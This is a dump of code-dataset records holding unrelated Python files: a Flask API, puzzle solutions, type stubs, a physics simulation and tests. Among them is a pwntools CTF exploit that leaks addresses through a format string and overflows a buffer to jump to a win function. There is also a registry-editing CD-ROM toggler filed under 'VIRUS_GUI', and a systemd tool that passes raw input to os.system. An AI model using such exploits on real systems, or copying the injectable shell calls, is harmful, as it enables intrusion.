review_put(review_id):\n    \"\"\"\n    updates specific Review object by ID\n    :param review_id: Review object ID\n    :return: Review object and 200 on success, or 400 or 404 on failure\n    \"\"\"\n    place_json = request.get_json(silent=True)\n\n    if place_json is None:\n        abort(400, 'Not a JSON')\n\n    fetched_obj = storage.get(\"Review\", str(review_id))\n\n    if fetched_obj is None:\n        abort(404)\n\n    for key, val in place_json.items():\n        if key not in [\"id\", \"created_at\", \"updated_at\", \"user_id\",\n                       \"place_id\"]:\n            setattr(fetched_obj, key, val)\n\n    fetched_obj.save()\n\n    return jsonify(fetched_obj.to_json())\n\n\n@app_views.route(\"/reviews/<review_id>\", methods=[\"DELETE\"],\n                 strict_slashes=False)\ndef review_delete_by_id(review_id):\n    \"\"\"\n    deletes Review by id\n    :param review_id: Review object id\n    :return: empty dict with 200 or 404 if not found\n    \"\"\"\n\n    fetched_obj = 
storage.get(\"Review\", str(review_id))\n\n if fetched_obj is None:\n abort(404)\n\n storage.delete(fetched_obj)\n storage.save()\n\n return jsonify({})\n","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525380740","text":"import sys\n\nn = int(sys.stdin.readline())\n\ndef fibonocci(n,result):\n result.append((0,1,0))\n result.append((1,0,1))\n\n for i in range(n+1):\n if i > 1:\n _sum = result[i-1][0] + result[i-2][0]\n t0 = result[i-1][1] + result[i-2][1]\n t1 = result[i-1][2] + result[i-2][2]\n result.append((_sum,t0,t1))\n return result[n][0],result[n][1],result[n][2]\nfor i in range(n):\n line = sys.stdin.readline().rstrip()\n buffer = int(line)\n result = []\n r,t0,t1 = fibonocci(buffer,result)\n print(t0,t1)\n\n \"\"\"\n //bottom to top\n result[0] = (0,1,0)\n result[1] = (1,0,1)\n\n for i = 0 to n\n if result[n] = empty\n result[n] = result[n-1] + result[n-2]#각각 column대로 더하기\n 피보나치 수열은 다음처럼 구성된다\n 0 1 1 2 3 5 8 ... 값\n 0 1 2 3 4 5 6 ... 인덱스\n\n fib(n)에 대해서 결과 값과 0과 1이 나온 횟수를 (_sum, t0, t1)이라고 tuple로 만들자. 그러면\n fib(0) = (0,1,0) \n fib(1) = (1,0,1)\n\n fib(2) = fib(0) + fib(1) = (1,1,1)이다.\n fib(3) = fib(2) + fib(1) = (2,1,2)이다.\n n이 1 증가할 때 기존의 fib(n-1)에 속한 0과 1의 수에 fib(n-2)속한 0과 1의 수를 각각 더해진다.\n\n bottomup 방식으로 하면 n까지 그냥 다 더하면 된다.\n\n \"\"\"","sub_path":"code/1003/1003_dp_bottomTop.py","file_name":"1003_dp_bottomTop.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129688781","text":"from winreg import *\nfrom tkinter import *\n\nwin = Tk()\n\nwin.title(\"CDROM Controler\")\nwin.geometry(\"400x400\")\nwin.resizable(0,0)\n\n\n#This is Function for Disable CDROM\ndef disable_cdrom():\n keyVal = r'SYSTEM\\CurrentControlSet\\Services\\cdrom'\n try:\n key = OpenKey(HKEY_LOCAL_MACHINE,keyVal,0,KEY_ALL_ACCESS)\n l3= Label (win, text=\"CDROM Is Disabled.\").pack()\n except:\n key = CreateKey(HKEY_LOCAL_MACHINE,keyVal)\n SetValueEx(key,\"start\",0,REG_DWORD,4)\n CloseKey(key)\n\ndef enable_cdrom():\n keyVal = r'SYSTEM\\CurrentControlSet\\Services\\cdrom'\n try:\n key = OpenKey(HKEY_LOCAL_MACHINE,keyVal,0,KEY_ALL_ACCESS)\n l3= Label (win, text=\"CDROM Is Enabled.\").pack()\n except:\n key = CreateKey(HKEY_LOCAL_MACHINE,keyVal)\n SetValueEx(key,\"start\",0,REG_DWORD,1)\n CloseKey(key)\n\n\ndisable_button = Button (win, text=\"CDROM Disable\", fg=\"red\", bg=\"yellow\", command= disable_cdrom).pack(padx=10, pady=10)\nenable_button = Button (win, text=\"CDROM Enable\", fg=\"red\", bg=\"yellow\", command= enable_cdrom).pack(padx=10, pady=10)\n\nwin.mainloop()\n","sub_path":"Pentest and Network/VIRUS_GUI/T4_CDROM_Controler/CDROM_CNTRL.py","file_name":"CDROM_CNTRL.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"367385662","text":"\"\"\"\nType annotations for honeycode service literal definitions.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_honeycode/literals.html)\n\nUsage::\n\n ```python\n from mypy_boto3_honeycode.literals import ErrorCodeType\n\n data: ErrorCodeType = \"ACCESS_DENIED\"\n ```\n\"\"\"\nimport sys\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\n \"ErrorCodeType\",\n \"FormatType\",\n 
\"ImportDataCharacterEncodingType\",\n \"ImportSourceDataFormatType\",\n \"ListTableColumnsPaginatorName\",\n \"ListTableRowsPaginatorName\",\n \"ListTablesPaginatorName\",\n \"QueryTableRowsPaginatorName\",\n \"TableDataImportJobStatusType\",\n \"UpsertActionType\",\n)\n\nErrorCodeType = Literal[\n \"ACCESS_DENIED\",\n \"FILE_EMPTY_ERROR\",\n \"FILE_NOT_FOUND_ERROR\",\n \"FILE_PARSING_ERROR\",\n \"FILE_SIZE_LIMIT_ERROR\",\n \"INVALID_FILE_TYPE_ERROR\",\n \"INVALID_IMPORT_OPTIONS_ERROR\",\n \"INVALID_TABLE_COLUMN_ID_ERROR\",\n \"INVALID_TABLE_ID_ERROR\",\n \"INVALID_URL_ERROR\",\n \"RESOURCE_NOT_FOUND_ERROR\",\n \"SYSTEM_LIMIT_ERROR\",\n \"TABLE_NOT_FOUND_ERROR\",\n \"UNKNOWN_ERROR\",\n]\nFormatType = Literal[\n \"ACCOUNTING\",\n \"AUTO\",\n \"CONTACT\",\n \"CURRENCY\",\n \"DATE\",\n \"DATE_TIME\",\n \"NUMBER\",\n \"PERCENTAGE\",\n \"ROWLINK\",\n \"ROWSET\",\n \"TEXT\",\n \"TIME\",\n]\nImportDataCharacterEncodingType = Literal[\n \"ISO-8859-1\", \"US-ASCII\", \"UTF-16\", \"UTF-16BE\", \"UTF-16LE\", \"UTF-8\"\n]\nImportSourceDataFormatType = Literal[\"DELIMITED_TEXT\"]\nListTableColumnsPaginatorName = Literal[\"list_table_columns\"]\nListTableRowsPaginatorName = Literal[\"list_table_rows\"]\nListTablesPaginatorName = Literal[\"list_tables\"]\nQueryTableRowsPaginatorName = Literal[\"query_table_rows\"]\nTableDataImportJobStatusType = Literal[\"COMPLETED\", \"FAILED\", \"IN_PROGRESS\", \"SUBMITTED\"]\nUpsertActionType = Literal[\"APPENDED\", \"UPDATED\"]\n","sub_path":"typings/mypy_boto3_honeycode/literals.pyi","file_name":"literals.pyi","file_ext":"pyi","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410018042","text":"from pwn import *\n\n#calculate libc base fiirst %p - 0x1eb723\n#libc_offset = 0x1eb72\npie_offset = 0xb21\nwin_offset = 0x9ec\nret_offset = 0xaf3\n\nleak = \"AAAA %39$lp BBBB\"\nspell = \"Expelliarmus\\x00\"\npad = cyclic(0xff+0xf)\n\n#p = remote(\"hax1.allesctf.net\",9100)\np = process(\"./pwn1\")\n\nprint(p.recvline())\np.sendline(leak)\ntmp = p.recvuntil(\"spell:\")\nprint(tmp)\n\npie_addr = tmp.split()[-6]\nprint(pie_addr)\n\npie_base = int(pie_addr,16)-pie_offset\nwin_fun = pie_base+win_offset\nprint(\"[*] PIE base addr: {}\".format(hex(pie_base)))\nprint(\"[*] WINgardium addr: {}\".format(hex(win_fun)))\n\nret = pie_base + ret_offset\n\nraw_input(\"Exploit ?\")\nidx = cyclic_find(\"cnaacoaa\")\n\np.sendline(spell+pad[:idx]+p64(ret)+p64(win_fun))\np.interactive()\n","sub_path":"cscg/pwn/pwn1/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495816989","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Arch Control Panel - Systemd Manager\nimport os,subprocess,windowsize,aaa\n\ndef systemd():\n\tsysdstate=1\n\tos.system(\"clear\")\n\twhile sysdstate==1:\n\n\t\taaa.hr()\n\t\tprint(\"\"\" Arch Control Panel Systemd Manager\n\n1- List running services\n2- List failed services\n3- See status of a service\n\n4- Enable service(s)\n5- Disable service(s)\n6- Start service(s)\n7- Stop service(s)\n8- Restart service(s)\n9- Reload service(s)\n10- Reload systemd\n\n11- Exit from Systemd Manager\n\nYour choice> \"\"\")\n\t\tchoice=int(input())\n\t\tif choice==1:\n\t\t\tos.system(\"systemctl\")\n\t\n\t\telif choice==2:\n\t\t\tos.system(\"systemctl --failed\")\n\t\t\n\t\telif choice==3:\n\t\t\tprint(\"Service(s): \", 
end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl status \" + service)\n\t\t\n\t\telif choice==4:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl enable \" + service)\n\n\t\telif choice==5:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl disable \" + service)\n\n\t\telif choice==6:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl start \" + service)\n\t\n\t\telif choice==7:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl stop \" + service)\n\t\t\t\n\t\telif choice==8:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl restart \" + service)\n\n\t\telif choice==9:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl reload \" + service)\n\t\t\t\n\t\telif choice==10:\n\t\t\tos.system(\"systemctl daemon-reload\")\n\t\t\t\n\t\telif choice==11:\n\t\t\tsysdstate=0\n\t\t\t\n\t\telse:\n\t\t\tprint (\"Invalid choice\")\n\t\n\n\n\n","sub_path":"systemdmanager.py","file_name":"systemdmanager.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"19663544","text":"from itertools import combinations, permutations\nimport heapq\n\nfrom random import choice\n\nimport re\n\nfrom collections import OrderedDict\n\ndef replacenth(string, sub, wanted, n):\n where = [m.start() for m in re.finditer(sub, string)][n-1]\n before = string[:where]\n after = string[where:]\n after = after.replace(sub, wanted, 1)\n newString = before + after\n return newString\n\n \nTAB = '\\t'\nNL = '\\n'\n\nex2 = \"\"\"class: 0-1 or 4-19\nrow: 0-5 or 8-19\nseat: 0-13 or 16-19\n\nyour ticket:\n11,12,13\n\nnearby tickets:\n3,9,18\n15,1,5\n5,14,9\"\"\"\n\nexample_input = '''class: 1-3 or 5-7\nrow: 6-11 or 33-44\nseat: 13-40 or 45-50\n\nyour ticket:\n7,1,14\n\nnearby tickets:\n7,3,47\n40,4,50\n55,2,20\n38,6,12'''\n\npuzzle_input = \"\"\"\"\"\"\n\nTARGET = 71\n\n\n\nwith open(\"day16.txt\") as f:\n puzzle_input = f.read()\n\nexample_input = example_input.split(NL)\npuzzle_input = puzzle_input.split(NL)\nex2 = ex2.split(NL)\n\nexamples = [example_input, ex2]\ntargets = [TARGET, None]\n\n\ndef sudoku(d):\n \n print(\"{:<20}\".format(\"X\"), end=\" \")\n for i in range(20):\n\n print(\"{:<4}\".format(i), end= \" \")\n\n print()\n\n for f, j in d.items():\n\n print(\"{:<20}\".format(f), end=\" \")\n for i in range(20):\n if i in j:\n print(\"{:<4}\".format(i), end= \" \")\n else:\n print(\"{:<4}\".format(\" \"), end= \" \")\n print()\n\n \n\n\n\ndef log(*s, end=NL):\n if LOG:\n for i in s:\n print(i, end=\" \")\n print(end, end=\"\")\n\ndef print_grid(data):\n for i, row in enumerate(data):\n for j, cell in enumerate(row):\n\n p = ' '\n if i == y and j == x:\n p = '!'\n log(\"{1}{0}{1}\".format(i, p))\n log()\n\n\n \ndef solve(data, cap):\n\n result = None\n\n details = {}\n\n tickets = {} \n \n stuff = \"\"\n ticket = False\n nearby = False\n for line in data:\n \n \n if ticket:\n ticket = False\n tickets[\"your ticket\"] = list(map(int, line.split(\",\")))\n\n if nearby: \n try:\n tickets[\"nearby\"].append(list(map(int, line.split(\",\"))))\n except:\n tickets[\"nearby\"] = [list(map(int, line.split(\",\")))]\n\n\n\n\n\n if \"your ticket\" in line:\n ticket = True\n continue\n\n elif \"nearby\" in line:\n nearby = True\n continue\n\n\n \n if \":\" in line:\n x, y = 
line.split(\":\")\n\n details[x] = y.split(\" or \")\n\n\n\n invalid = []\n\n for count, ticket in enumerate(list(tickets[\"nearby\"])):\n\n\n\n ticket_valid = True\n for t in ticket:\n valid = False\n #print(\"t is\", t)\n for field, params in details.items(): \n \n for p in params:\n\n mini, maxi = p.split(\"-\")\n\n if int(t) >= int(mini) and int(t) <= int(maxi):\n \n valid = True\n\n if not valid:\n ticket_valid = False\n invalid.append(t)\n \n if not ticket_valid:\n print(\"removing ticket\")\n print(ticket) \n\n tickets[\"nearby\"].remove(ticket)\n \n print(len(tickets[\"nearby\"]), 'nearby tyickets remain')\n input()\n return sum(invalid), details, tickets\n\n\ndef solve2(details, tickets):\n \n \n field_map = {f:{\"valid\":set(), \"range\":v} for f, v in details.items()}\n\n valid_map = OrderedDict({f:[] for f in details.keys()})\n \n\n print(len(tickets[\"nearby\"]), 'nearby tyickets remain')\n input()\n\n all_tickets = list([tickets[\"your ticket\"]])\n\n\n all_tickets.extend(tickets[\"nearby\"])\n \n \n \n field_list = list(field_map.keys())\n print(field_list)\n \n #print(field_list)\n ## loop through each field\n i = 0\n\n\n ticket_valid_map = OrderedDict({i:{} for i in range(len(all_tickets))})\n\n for ticket_no, ticket in enumerate(all_tickets): ## loop through each ticket\n \n for column in range(len(ticket)):\n ticket_valid_map[ticket_no][column] = []\n i = 0 \n while i < len(field_list):\n\n field_valid_for_column = True\n\n \n \n field = str(field_list[i])\n lo1, hi1 = map(int, field_map[field][\"range\"][0].split(\"-\"))\n lo2, hi2 = map(int, field_map[field][\"range\"][1].split(\"-\"))\n \n\n \n t = int(ticket[column]) \n \n if not ((t >= lo1 and t <= hi1) or (t >= lo2 and t <= hi2)):\n\n field_valid_for_column = False\n \n \n\n if field_valid_for_column:\n #print(\"field\", field, \"VALID for column\", column)\n if LOG:\n input()\n #print(field_list[i])\n ticket_valid_map[ticket_no][column].append(field)\n \n \n\n i += 1\n\n print(\"finished loop\")\n\n for ticket, data in ticket_valid_map.items():\n\n for col, fields in data.items():\n \n print(\"ticket\", ticket, \"col\", col, \"only has these possibilities\", fields)\n print(all_tickets[ticket])\n\n input()\n\n\n chosen_field = choice(list(valid_map.keys()))\n log(\"Chose\", chosen_field)\n\n all_poss = set()\n [all_poss.update(v) for v in valid_map.values()]\n\n log(\"possibilities are\", all_poss)\n\n\n\n\n\n print(valid_map)\n \n final_valid_map = {k:list(v) for k, v in valid_map.items()}\n\n [final_valid_map.pop(key) for key in valid_map.keys() if not key.startswith(\"departure\")]\n\n \n \n\n print(final_valid_map)\n\n \n\n\n sudoku(final_valid_map)\n\n input(\"help\")\n\n \n ## match columns to tickets\n\n my_ticket = list(map(int, ['157', '73', '79', '191', '113', '59', '109', '61', '103', '101', '67', '193', '97', '179', '107', '89', '53', '71', '181', '83']))\n\n final_ticket = {k:None for k in my_ticket}\n\n\n final_poss = []\n\n while True:\n this_poss = []\n \n\n while len(this_poss) < 6:\n \n \n for key, possibilities in final_valid_map.items():\n \n \n removed = possibilities.pop(0)\n\n if removed not in this_poss and len(this_poss) < 6:\n this_poss.append(removed)\n \n \n possibilities.append(removed)\n \n \n \n \n \n print(this_poss)\n \n final_poss.append(this_poss)\n\n if final_poss.count(final_poss[-1]) > 1:\n break\n \n \n\n\n\n ## go through unknown columns, check values against ranges\n \n \n\n\n\n \n \n\n \n \n\n \n\n \n \n \n\n \n\n \n \nLOG = False\n\nd = OrderedDict([('departure location', 
{6, 7, 10, 13, 16, 17}), ('departure station', {16, 10, 6, 7}), ('departure platform', {4, 6, 7, 10, 13, 16, 17}), ('departure track', {1, 4, 6, 7, 10, 13, 16, 17}), ('departure date', {4, 6, 7, 10, 13, 16, 17}), ('departure time', {6, 7, 10, 16, 17}), ('arrival location', {7}), ('arrival station', {1, 4, 6, 7, 10, 13, 16, 17}), ('arrival platform', {0, 1, 4, 6, 7, 10, 11, 13, 16, 17}), ('arrival track', {10, 6, 7}), ('class', {0, 1, 4, 6, 7, 10, 13, 16, 17}), ('duration', {10, 6, 7}), ('price', {7}), ('route', {16, 10, 6, 7}), ('row', {0, 1, 4, 6, 7, 10, 13, 16, 17}), ('seat', {10, 6, 7}), ('train', {10, 6, 7}), ('type', {6, 7}), ('wagon', {1, 4, 6, 7, 10, 13, 16, 17}), ('zone', {0, 1, 4, 6, 7, 10, 11, 12, 13, 16, 17})])\n\nsudoku(d)\n\n \n\n \n\n\n##print(\"Solving example\")\n##results, details, tickets = solve(ex2, cap=2020)\n##print(\"results\")\n##print(results)\n##print(\"Target\")\n##print(TARGET)\n##print(\"task 2\")\n##result = solve2(details, tickets)\n##print(results)\n\n\n \n\nprint(\"Success, solving puzzle input\")\n\nresults, details, tickets = solve(puzzle_input, cap=30000000)\nresult = solve2(details, tickets)\nprint(\"Result is\", result)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DAY 16 - train tickets - ticket valid map.py","file_name":"DAY 16 - train tickets - ticket valid map.py","file_ext":"py","file_size_in_byte":8166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511329198","text":"import sys\nimport os\nimport math\nimport random\nfrom JPackage import JPAstro\nfrom JPackage import JPThermal\nfrom JPackage.JMath import Vector3\nimport pandas as pd\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nif os.name == 'posix':\n if sys.version_info[0] == 2:\n import Tkinter as Tk\n else:\n import tkinter as Tk\nif os.name == 'nt':\n import tkinter as Tk\n\nclass Main:\n\n global fig\n global canvas\n global ax\n global astro_eqs\n global therm_consts\n global particles\n global time_step\n global distance_scale\n global p_boxes\n global v_boxes\n global m_boxes\n global f_boxes\n\n def __init__(self):\n root = Tk.Tk()\n root.wm_title('Dark Matter Simulation')\n self.fig = Figure(figsize=(8, 8), dpi=100)\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.canvas = FigureCanvasTkAgg(self.fig, master=root)\n self.canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)\n self.canvas._tkcanvas.pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)\n self.astro_eqs = JPAstro.Equations()\n self.therm_consts = JPThermal.Constants\n self.time_step = math.pow(10, 13)\n self.distance_scale = math.pow(10, 0)\n self.p_boxes = []\n self.v_boxes = []\n self.m_boxes = []\n self.f_boxes = []\n positions = []\n masses = []\n forces = []\n velocities = []\n for x in range(-120, 121, 40):\n for y in range(-120, 121, 40):\n for z in range(-120, 121, 40):\n offset_x = (random.random() - .5) * 20\n offset_y = (random.random() - .5) * 20\n offset_z = (random.random() - .5) * 20\n pos = Vector3(x + offset_x, y + offset_y, z + offset_z)\n #v_x = (random.random() - .5)\n #v_y = (random.random() - .5)\n #v_z = (random.random() - .5)\n #pos = Vector3(x, y, z)\n #vel = Vector3(v_x, v_y, v_z)\n positions.append(pos)\n masses.append(math.pow(10, 0))\n forces.append(Vector3(0, 0, 0))\n velocities.append(Vector3(0, 0, 0))\n\n for i in 
range(0, 241):\n self.p_boxes.append([])\n self.v_boxes.append([])\n self.m_boxes.append([])\n self.f_boxes.append([])\n for j in range(0, 241):\n self.p_boxes[i].append([])\n self.v_boxes[i].append([])\n self.m_boxes[i].append([])\n self.f_boxes[i].append([])\n for k in range(0, 241):\n self.p_boxes[i][j].append([])\n self.v_boxes[i][j].append([])\n self.m_boxes[i][j].append([])\n self.f_boxes[i][j].append([])\n data = {'Position' : positions, 'Mass' : masses, 'Force' : forces, 'Velocity' : velocities}\n\n self.particles = pd.DataFrame(data)\n\n self.Update()\n\n def Update(self):\n while True:\n print('Drawing')\n self.Draw()\n print('Putting In Boxes')\n self.Put_In_Boxes()\n print('Updating Gravity')\n self.Update_Gravity()\n print('Updating Pressure')\n self.Update_Pressure()\n print('Updating Velocities')\n self.Update_Velocities()\n print('Updating Positions')\n self.Update_Positions()\n\n def Put_In_Boxes(self):\n for i in range(0, len(self.particles['Position'])):\n p = self.particles['Position'][i]\n v = self.particles['Velocity'][i]\n m = self.particles['Mass'][i]\n f = self.particles['Force'][i]\n try:\n self.p_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(i)\n self.v_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(v)\n self.m_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(m)\n self.f_boxes[int(p.x) + 120][int(p.z) + 120][int(p.y) + 120].append(f)\n except:\n pass\n\n def Update_Pressure(self):\n for a in range(0, len(self.p_boxes)):\n for b in range(0, len(self.p_boxes[a])):\n for c in range(0, len(self.p_boxes[a][b])):\n pres = self.Get_Pressure(self.v_boxes[a][b][c], self.m_boxes[a][b][c])\n for i in range(0, len(self.p_boxes[a][b][c])):\n direction = self.particles['Position'][i].Subtract(Vector3(a, b, c)).Normalize()\n self.particles.set_value(i, self.p_boxes[a][b][c][i], 'Force', self.particles['Force'][i].Add(direction.Scalar_Mult(pres)))\n\n def Get_Pressure(self, vbox, mbox):\n n = len(vbox)\n if not n == 0:\n V = 1\n R = self.therm_consts.R\n t_tot = 0\n for i in range(0, n):\n vel = vbox[i]\n m = mbox[i]\n t = vel.Length() * vel.Length() * m / (3 * R)\n t_tot = t_tot + t\n T = t_tot / n\n p = n * R * T / V\n else:\n p = 0\n return(p)\n\n def Update_Gravity(self):\n for i in range(0, len(self.particles['Position']) - 1):\n for j in range(i + 1, len(self.particles['Position'])):\n if not i == j:\n m_i = self.particles['Mass'][i]\n m_j = self.particles['Mass'][j]\n p_i = self.particles['Position'][i]\n p_j = self.particles['Position'][j]\n R = p_i.Distance(p_j)\n direction = p_j.Subtract(p_i).Normalize()\n F = self.astro_eqs.Solve_Equation('F = (G M m) / (R^2)', 'F', m_i, m_j, R)\n grav_i = direction.Scalar_Mult(F)\n grav_j = grav_i.Scalar_Mult(-1)\n self.particles.set_value(i, 'Force', self.particles['Force'][i].Add(grav_i))\n self.particles.set_value(j, 'Force', self.particles['Force'][j].Add(grav_j))\n\n def Update_Velocities(self):\n for i in range(0, len(self.particles['Position'])):\n self.particles.set_value(i, 'Velocity', self.particles['Velocity'][i].Add(self.particles['Force'][i].Scalar_Mult(self.time_step)))\n\n def Update_Positions(self):\n for i in range(0, len(self.particles['Position'])):\n self.particles.set_value(i, 'Position', self.particles['Position'][i].Add(self.particles['Velocity'][i]))\n\n def Draw(self):\n xs = []\n ys = []\n zs = []\n us = []\n vs = []\n ws = []\n counter = 0\n for pos in self.particles['Position']:\n velocity = self.particles['Velocity'][counter]\n xs.append(pos.x)\n ys.append(pos.y)\n 
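# z completes each position triple; the velocity components gathered below become the quiver arrows
            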
zs.append(pos.z)\n us.append(velocity.x)\n vs.append(velocity.y)\n ws.append(velocity.z)\n counter = counter + 1\n self.ax.clear()\n if sys.version_info[0] == 3:\n self.ax.quiver(xs, ys, zs, us, vs, ws, length = 10, pivot = 'tail', arrow_length_ratio = .75)\n self.ax.scatter(xs, ys, zs, c='r', s=10, marker = 'o')\n self.ax.set_xlim3d(-120, 120)\n self.ax.set_ylim3d(-120, 120)\n self.ax.set_zlim3d(-120, 120)\n self.ax.set_xlabel('X Label')\n self.ax.set_ylabel('Y Label')\n self.ax.set_zlabel('Z Label')\n self.canvas.draw()\n\n def rgb_to_hex(self, rgb):\n return '#%02x%02x%02x' % rgb\n\n def print_full(self, x):\n pd.set_option('display.max_rows', len(x))\n print(x)\n pd.reset_option('display.max_rows')\n\nif __name__ == '__main__':\n Main()\n","sub_path":"Dark_Matter_Simulation_2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84353080","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for the market data.\"\"\"\nimport tensorflow.compat.v2 as tf\n\nimport tf_quant_finance as tff\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\ncore = tff.experimental.pricing_platform.framework.core\nmarket_data = tff.experimental.pricing_platform.framework.market_data\ninterpolation_method = tff.experimental.pricing_platform.framework.core.interpolation_method\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass MarketDataTest(tf.test.TestCase):\n\n def setUp(self):\n dates = [[2021, 2, 8], [2022, 2, 8], [2023, 2, 8], [2025, 2, 8],\n [2027, 2, 8], [2030, 2, 8], [2050, 2, 8]]\n discounts = [0.97197441, 0.94022746, 0.91074031, 0.85495089, 0.8013675,\n 0.72494879, 0.37602059]\n libor_3m_config = market_data.config.RateConfig(\n interpolation_method=interpolation_method.InterpolationMethod.LINEAR)\n\n self._rate_config = {\"USD\": {\"LIBOR_3M\": libor_3m_config}}\n risk_free_dates = [\n [2021, 2, 8], [2022, 2, 8], [2023, 2, 8], [2025, 2, 8], [2050, 2, 8]]\n risk_free_discounts = [\n 0.97197441, 0.94022746, 0.91074031, 0.85495089, 0.37602059]\n self._market_data_dict = {\"USD\": {\n \"risk_free_curve\":\n {\"dates\": risk_free_dates, \"discounts\": risk_free_discounts},\n \"OIS\":\n {\"dates\": dates, \"discounts\": discounts},\n \"LIBOR_3M\":\n {\"dates\": dates, \"discounts\": discounts},}}\n self._valuation_date = [(2020, 6, 24)]\n self._libor_discounts = discounts\n self._risk_free_discounts = risk_free_discounts\n super(MarketDataTest, self).setUp()\n\n def test_discount_curve(self):\n market = market_data.MarketDataDict(\n self._valuation_date,\n self._market_data_dict,\n config=self._rate_config)\n # Get the risk free discount curve\n risk_free_curve_type = core.curve_types.RiskFreeCurve(currency=\"USD\")\n risk_free_curve = market.yield_curve(risk_free_curve_type)\n # Get LIBOR 3M discount\n libor_3m = core.rate_indices.RateIndex(type=\"LIBOR_3M\")\n 
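# a rate index curve is keyed by the currency plus the index it fixes against
    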
rate_index_curve_type = core.curve_types.RateIndexCurve(\n currency=\"USD\", index=libor_3m)\n libor_3m_curve = market.yield_curve(rate_index_curve_type)\n with self.subTest(\"RiskFree\"):\n discount_factor_nodes = risk_free_curve.discount_factor_nodes\n self.assertAllClose(discount_factor_nodes, self._risk_free_discounts)\n with self.subTest(\"LIBOR_3M\"):\n discount_factor_nodes = libor_3m_curve.discount_factor_nodes\n self.assertAllClose(discount_factor_nodes, self._libor_discounts)\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","sub_path":"tf_quant_finance/experimental/pricing_platform/framework/market_data/market_data_test.py","file_name":"market_data_test.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"293641305","text":"\nimport testtools\nimport sys\nimport six\n\nfrom oslo_log import log as logging\nfrom frontend import config\nfrom frontend.lib import decorators\n#from nose.plugins.attrib import attr\nimport nose.plugins.attrib\n\n\nCONF = config.CONF\n\nLOG = logging.getLogger(__name__)\n\nidempotent_id = decorators.idempotent_id\n\nat_exit_set = set()\n\ndef attr(**kwargs):\n \"\"\"A decorator which applies the testtools attr decorator\n\n This decorator applies the testtools.testcase.attr if it is in the list of\n attributes to testtools we want to apply.\n \"\"\"\n \n def decorator(f):\n if 'type' in kwargs and isinstance(kwargs['type'], str):\n #f = testtools.testcase.attr(kwargs['type'])(f)\n f = nose.plugins.attrib.attr(kwargs['type'])(f)\n elif 'type' in kwargs and isinstance(kwargs['type'], list):\n \n for attr in kwargs['type']:\n #f = testtools.testcase.attr(attr)(f)\n f = nose.plugins.attrib.attr(attr)(f)\n return f\n \n return decorator\n\n\nclass BaseTestCase(testtools.testcase.WithAttributes,testtools.TestCase):\n setUpClassCalled = False\n \n def assertEmpty(self, list, msg=None):\n self.assertTrue(len(list) == 0, msg)\n\n def assertNotEmpty(self, list, msg=None):\n self.assertTrue(len(list) > 0, msg)\n \n @classmethod\n def setUpClass(cls):\n # It should never be overridden by descendants\n if hasattr(super(BaseTestCase, cls), 'setUpClass'):\n super(BaseTestCase, cls).setUpClass()\n cls.setUpClassCalled = True\n # Stack of (name, callable) to be invoked in reverse order at teardown\n cls.teardowns = []\n try:\n # Shortcuts to clients\n cls.setup_clients()\n cls.resource_setup()\n except Exception:\n etype, 